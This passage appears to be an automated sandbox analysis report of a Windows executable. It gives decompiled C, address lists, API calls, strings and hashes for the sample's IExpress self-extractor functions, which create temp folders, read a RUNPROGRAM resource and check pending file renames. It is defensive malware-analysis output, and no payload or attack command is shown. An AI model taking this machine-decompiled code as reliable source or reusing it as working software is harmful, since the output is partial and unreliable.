														_t82 =  &_v268;
														_t44 = E0040597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x408b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00405467(0x408b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E004044B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E004044B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x409124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E004044B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0x409124 = E00406285();
					L2:
					_t38 = 0;
				}
				L47:
				return E00406CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}

0x004055ab
0x004055b2
0x004055c9
0x004055d5
0x004055d9
0x00405600
0x00405605
0x0040560a
0x0040560c
0x00405638
0x00405641
0x00405643
0x00405645
0x00405645
0x0040564c
0x00405652
0x00405657
0x00405659
0x00405696
0x0040569c
0x0040589f
0x004058a7
0x004058ac
0x004058b3
0x004058b5
0x004056a2
0x004056a2
0x004056a8
0x00000000
0x004056ae
0x004056ae
0x004056b9
0x004056bf
0x004056c1
0x004056f3
0x004056f3
0x00405705
0x0040570a
0x00405711
0x00405717
0x00405724
0x00405726
0x00405729
0x00405730
0x00405737
0x0040573d
0x00405740
0x00000000
0x00000000
0x00000000
0x00000000
0x0040572b
0x0040572b
0x0040572e
0x00405742
0x00405742
0x00405745
0x0040576b
0x0040576b
0x00000000
0x00405747
0x00405747
0x0040574d
0x0040574f
0x00405771
0x00405771
0x00405773
0x00000000
0x00405751
0x00405751
0x00405753
0x00000000
0x00405755
0x0040575b
0x00405760
0x00405762
0x00000000
0x00405764
0x00405764
0x00405769
0x0040577e
0x0040577e
0x00405781
0x00405788
0x0040578d
0x0040578f
0x004057b2
0x004057b8
0x004057bd
0x004057bf
0x004057cd
0x004057cd
0x004057dd
0x004057e3
0x004057ef
0x004057f5
0x004057f8
0x0040580a
0x0040580a
0x004057fa
0x00405802
0x00405802
0x0040580d
0x0040580f
0x00405830
0x00405836
0x0040583d
0x0040584b
0x00405851
0x00405855
0x0040585a
0x0040585c
0x00000000
0x0040585e
0x0040585e
0x00000000
0x0040585e
0x00405811
0x00405817
0x00405819
0x0040581f
0x00000000
0x0040581f
0x00405791
0x00405797
0x0040579c
0x0040579e
0x00000000
0x004057a0
0x004057a9
0x004057ae
0x004057b0
0x00000000
0x00000000
0x00000000
0x00000000
0x004057b0
0x0040579e
0x00000000
0x00000000
0x00000000
0x00405769
0x00405762
0x00405753
0x0040574f
0x00000000
0x00000000
0x00000000
0x0040572e
0x00000000
0x00405864
0x00405864
0x00405864
0x00405717
0x00000000
0x004056c3
0x004056c5
0x004056c9
0x004056ce
0x004056d0
0x00000000
0x004056d6
0x004056d6
0x004056d8
0x004056dd
0x004056df
0x00000000
0x004056e1
0x004056e2
0x004056e4
0x004056e6
0x004056eb
0x004056ed
0x00000000
0x004056f3
0x004056f3
0x00000000
0x0040586c
0x00405878
0x0040587e
0x00405882
0x00405883
0x00405889
0x0040588e
0x0040588e
0x00000000
0x00405896
0x004056ed
0x004056df
0x004056d0
0x004056c1
0x004056a8
0x0040565b
0x0040565b
0x0040565d
0x00405669
0x00405669
0x0040565f
0x0040565f
0x00405665
0x00405667
0x00000000
0x00000000
0x00405667
0x0040566c
0x00405673
0x00405678
0x0040567a
0x0040589b
0x0040589b
0x00405680
0x00405685
0x0040568c
0x00000000
0x0040568c
0x0040567a
0x0040560e
0x00405613
0x0040561a
0x00405620
0x00405626
0x00000000
0x00405626
0x004055db
0x004055e0
0x004055e7
0x004055f1
0x004055f6
0x004055f6
0x004055f6
0x004058b7
0x004058c7

APIs

Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
Part of subcall function 0040468F: SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
Part of subcall function 0040468F: LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
Part of subcall function 0040468F: LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
Part of subcall function 0040468F: memcpy_s.MSVCRT ref: 004046E5
Part of subcall function 0040468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 004055CF
lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00405638
LocalFree.KERNEL32(00000000), ref: 0040564C
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00405620

Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554

Part of subcall function 00406285: GetLastError.KERNEL32(00405BBC), ref: 00406285

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 004056B9
GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0040571E
GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00405737
GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 004057CD
GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 004057EF
CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00405802

Part of subcall function 00402630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00402654

SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00405830

Part of subcall function 00406517: FindResourceA.KERNEL32(00400000,000007D6,00000005), ref: 0040652A
Part of subcall function 00406517: LoadResource.KERNEL32(00400000,00000000,?,?,00402EE8,00000000,004019E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00406538
Part of subcall function 00406517: DialogBoxIndirectParamA.USER32(00400000,00000000,00000547,004019E0,00000000), ref: 00406557
Part of subcall function 00406517: FreeResource.KERNEL32(00000000,?,?,00402EE8,00000000,004019E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00406560

GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00405878

Part of subcall function 0040597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 004059A8
Part of subcall function 0040597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 004059AF

Strings

<None>, xrefs: 00405632
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 004056AE, 004056B3, 0040583D
RUNPROGRAM, xrefs: 004055BD, 00405600
msdownld.tmp, xrefs: 004057D3
Z, xrefs: 0040570A
A:\, xrefs: 004056F4

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
API String ID: 2436801531-3855382519
Opcode ID: 4971864637cee8b0fcbe78389781779da4c8e8b84f5700c2434fd0c7404e9403
Instruction ID: d5c9d26d297622afc2c63048806d0aa51a227b55250bd62e7bce8c8ac459e010
Opcode Fuzzy Hash: 4971864637cee8b0fcbe78389781779da4c8e8b84f5700c2434fd0c7404e9403
Instruction Fuzzy Hash: FE810871A046085ADB20AB319D45BEB726DDB50304F0444BBF986F32D1DF7C8D828E5D

Uniqueness

Uniqueness Score: -1.00%

Function 004044B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E004044B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0x408004; // 0xee8c6708
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0x408a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0x409a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E00401680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E0040171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E0040171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E0040681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E004067C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "doza2", _t49 | _a12 | _a16); // executed
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E0040681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E004067C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "doza2", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E00406CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}

0x004044b9
0x004044c4
0x004044cb
0x004044d8
0x004044e4
0x004044eb
0x004044ee
0x004044ef
0x004044ef
0x004044f1
0x004044f7
0x004044f8
0x0040467b
0x004044fe
0x00404509
0x00404518
0x00404525
0x00404562
0x00404568
0x00404568
0x0040456b
0x0040456b
0x0040456d
0x0040456e
0x00404572
0x00404578
0x0040457c
0x004045cb
0x00404607
0x00404607
0x0040460d
0x00404613
0x00404617
0x00000000
0x0040461d
0x00404623
0x00404626
0x00404628
0x00000000
0x00404628
0x004045cd
0x004045cd
0x004045cf
0x004045cf
0x004045d2
0x004045d2
0x004045d4
0x004045d5
0x004045db
0x004045de
0x004045e3
0x004045e9
0x004045ed
0x00000000
0x004045f3
0x004045fd
0x00000000
0x00404602
0x004045ed
0x0040457e
0x0040457e
0x00404580
0x00404580
0x00404583
0x00404583
0x00404585
0x00404586
0x0040458a
0x0040458c
0x0040458f
0x0040458f
0x00404591
0x00404592
0x0040459b
0x0040459e
0x004045a3
0x004045a9
0x004045ad
0x00000000
0x004045af
0x004045af
0x004045bf
0x0040462d
0x00404630
0x0040463d
0x0040464e
0x0040464e
0x0040463f
0x00404640
0x00404647
0x0040464c
0x00000000
0x00000000
0x0040464c
0x00404666
0x0040466d
0x0040466f
0x00404675
0x00404675
0x004045ad
0x00404527
0x0040452e
0x0040453f
0x0040453f
0x00404530
0x00404531
0x00404538
0x0040453d
0x00000000
0x00000000
0x0040453d
0x00404554
0x0040455a
0x0040455a
0x0040455a
0x00404525
0x0040468c

APIs

LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554
LocalAlloc.KERNEL32(00000040,00000065), ref: 004045A3
LocalAlloc.KERNEL32(00000040,00000065), ref: 004045E3
LocalAlloc.KERNEL32(00000040,00000002), ref: 0040460D
MessageBeep.USER32(00000000), ref: 00404630
MessageBoxA.USER32(?,00000000,doza2,00000000), ref: 00404666
LocalFree.KERNEL32(00000000), ref: 0040466F

Part of subcall function 0040681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0040686E
Part of subcall function 0040681F: GetSystemMetrics.USER32(0000004A), ref: 004068A7
Part of subcall function 0040681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 004068CC
Part of subcall function 0040681F: RegQueryValueExA.ADVAPI32(?,00401140,00000000,?,?,0000000C), ref: 004068F4
Part of subcall function 0040681F: RegCloseKey.ADVAPI32(?), ref: 00406902

Strings

LoadString() Error. Could not load string resource., xrefs: 004044E4
doza2, xrefs: 00404545, 0040465A

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
String ID: LoadString() Error. Could not load string resource.$doza2
API String ID: 3244514340-3130468218
Opcode ID: c9d5c5b1e490d48041246102af90d95d94e3abacc0a213a657fe916465fb66f7
Instruction ID: f9d95c897c3f9acb34889c8f4230c3a0684cd2a5052bf7c23177ba80834ac1ca
Opcode Fuzzy Hash: c9d5c5b1e490d48041246102af90d95d94e3abacc0a213a657fe916465fb66f7
Instruction Fuzzy Hash: 61510BB1900215AFDB219F28CD48BA77B68EF85304F1045BAFE45B7281DB3ADD15CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004053A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004053A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0x408004; // 0xee8c6708
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E0040171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E00401680(_t32, 0x104, _t20);
					E0040658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E00406CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0x408a20 = 1;
				goto L5;
			}

0x004053ac
0x004053b3
0x004053b9
0x004053bb
0x004053bd
0x004053bf
0x004053d1
0x004053d6
0x004053e0
0x004053e2
0x004053f5
0x004053fb
0x00405402
0x0040540b
0x00000000
0x00000000
0x00405413
0x00000000
0x00000000
0x00405415
0x00405416
0x00405427
0x0040542a
0x0040542b
0x00405434
0x00405434
0x0040543a
0x0040544c
0x0040544c
0x00405452
0x0040545a
0x00000000
0x00000000
0x0040545e
0x0040545f
0x00000000

APIs

Part of subcall function 0040171E: _vsnprintf.MSVCRT ref: 00401750

RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 004053FB
GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405402
GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040541F
DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040542B
CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405434
CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405452

Strings

IXP, xrefs: 00405419
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 004053B7, 004053E1, 0040541E
IXP%03d.TMP, xrefs: 004053C0

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
API String ID: 1082909758-3862032828
Opcode ID: 43f651f3391ef192c497bfbc0c6e30c6af2b5fc786458bd32b7fff1cca5d2d8e
Instruction ID: 125cfa7c81adbab0fbf8f7f76c25cee134d25006f7ef051e404a57ef8c01fb33
Opcode Fuzzy Hash: 43f651f3391ef192c497bfbc0c6e30c6af2b5fc786458bd32b7fff1cca5d2d8e
Instruction Fuzzy Hash: F711047170060467E3209F269D49FEF366DEBC1315F00013ABA46F22E0CE7889568AAE

Uniqueness

Uniqueness Score: -1.00%

Function 0040256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E0040256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E004024E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}

0x00402572
0x00402573
0x00402575
0x00402578
0x0040257d
0x00402627
0x00402583
0x00402586
0x00402589
0x004025eb
0x00402607
0x00000000
0x00402609
0x0040261a
0x00000000
0x0040261a
0x00000000
0x0040258b
0x0040258b
0x0040259e
0x004025b2
0x004025ba
0x004025cb
0x004025d1
0x004025d6
0x004025da
0x004025dd
0x004025dd
0x004025e3
0x004025e3
0x004025e3
0x0040258b
0x00402589
0x0040262f
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00404096,00404096,?,00401ED3,00000001,00000000,?,?,00404137,?), ref: 004025B2
RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00404096,?,00401ED3,00000001,00000000,?,?,00404137,?,00404096), ref: 004025CB
RegCloseKey.KERNELBASE(?,?,00401ED3,00000001,00000000,?,?,00404137,?,00404096), ref: 004025DD
RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00404096,00404096,?,00401ED3,00000001,00000000,?,?,00404137,?), ref: 004025FF
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00404096,00000000,00000000,00000000,00000000,?,00401ED3,00000001,00000000), ref: 0040261A

Strings

PendingFileRenameOperations, xrefs: 004025C3
System\CurrentControlSet\Control\Session Manager, xrefs: 004025A8
System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 004025F5

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: OpenQuery$CloseInfoValue
String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
API String ID: 2209512893-559176071
Opcode ID: c2d3288791866de7610645414065337d80aaeaca1c7ddf0c8aceb1b598e70452
Instruction ID: 778f9ec0fea580b62285155236816de8bc499f761098cae054ab7690dd904a70
Opcode Fuzzy Hash: c2d3288791866de7610645414065337d80aaeaca1c7ddf0c8aceb1b598e70452
Instruction Fuzzy Hash: 31118235902228BBDF209B919E0DDFB7E7CDF017A5F104076B808B21C0D6B44E48D6A9

Uniqueness

Uniqueness Score: -1.00%

Function 00406A60 Relevance: 13.6, APIs: 9, Instructions: 138
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E00407155();
				_push(0x58);
				_push(0x4072b8);
				E00407208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0x4088b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0x4088b0; // 0x2
						if(__eflags != 0) {
							 *0x4081e4 = _t58;
							goto L13;
						} else {
							 *0x4088b0 = _t58;
							__eflags = E00406C3F(0x4010b8, 0x4010c4);
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L00406FF4();
						L13:
						_t68 =  *0x4088b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0x4010b4);
							_push(0x4010ac);
							L00407202();
							 *0x4088b0 = 2;
						}
						if(_t53 == 0) {
							 *0x4088ac = 0;
						}
						_t71 =  *0x4088b4;
						if( *0x4088b4 != 0 && E00407060(_t71, 0x4088b4) != 0) {
							_t60 =  *0x4088b4; // 0x0
							 *0x40a288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x74895b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E00402BFB(0x400000, 0, _t59); // executed
							 *0x4081e0 = _t30;
							__eflags =  *0x4081f8;
							if( *0x4081f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0x4081e4;
							if( *0x4081e4 == 0) {
								__imp___cexit();
								_t30 =  *0x4081e0; // 0x80070002
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E0040724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}

0x00406a60
0x00406a6a
0x00406a6c
0x00406a71
0x00406a78
0x00406a7f
0x00406a85
0x00406a8e
0x00406a91
0x00406a93
0x00406a9c
0x00406aa2
0x00000000
0x00000000
0x00406aa6
0x00406ab4
0x00000000
0x00406aa8
0x00406aaa
0x00406aab
0x00406aab
0x00406abf
0x00406abf
0x00406ac5
0x00406ad1
0x00406ad7
0x00406b05
0x00000000
0x00406ad9
0x00406ad9
0x00406af0
0x00406af2
0x00000000
0x00406af4
0x00406af4
0x00406afb
0x00406afb
0x00406af2
0x00406ac7
0x00406ac7
0x00406ac9
0x00406b0b
0x00406b0b
0x00406b11
0x00406b13
0x00406b18
0x00406b1d
0x00406b24
0x00406b24
0x00406b30
0x00406b39
0x00406b39
0x00406b3b
0x00406b42
0x00406b57
0x00406b5f
0x00406b65
0x00406b65
0x00406b67
0x00406b6c
0x00406b6e
0x00406b71
0x00406b74
0x00406b74
0x00406b79
0x00000000
0x00000000
0x00406b7d
0x00406b81
0x00000000
0x00000000
0x00406b83
0x00406b8c
0x00406b8d
0x00406b90
0x00406b90
0x00406b83
0x00406b81
0x00406b94
0x00406b98
0x00406ba2
0x00406b9a
0x00406b9a
0x00406b9a
0x00406ba3
0x00406bab
0x00406bb0
0x00406bb5
0x00406bbc
0x00406bbf
0x00000000
0x00406bbf
0x00406c1e
0x00406c25
0x00406c27
0x00406c2d
0x00406c2d
0x00406c32
0x00000000
0x00406bc5
0x00406bc5
0x00406bc8
0x00406bcc
0x00406bce
0x00406bce
0x00406bd1
0x00406bd3
0x00406bd3
0x00406bd6
0x00406bda
0x00406be1
0x00406be3
0x00406be5
0x00406be5
0x00406be6
0x00406be6
0x00406be9
0x00406bea
0x00406bea
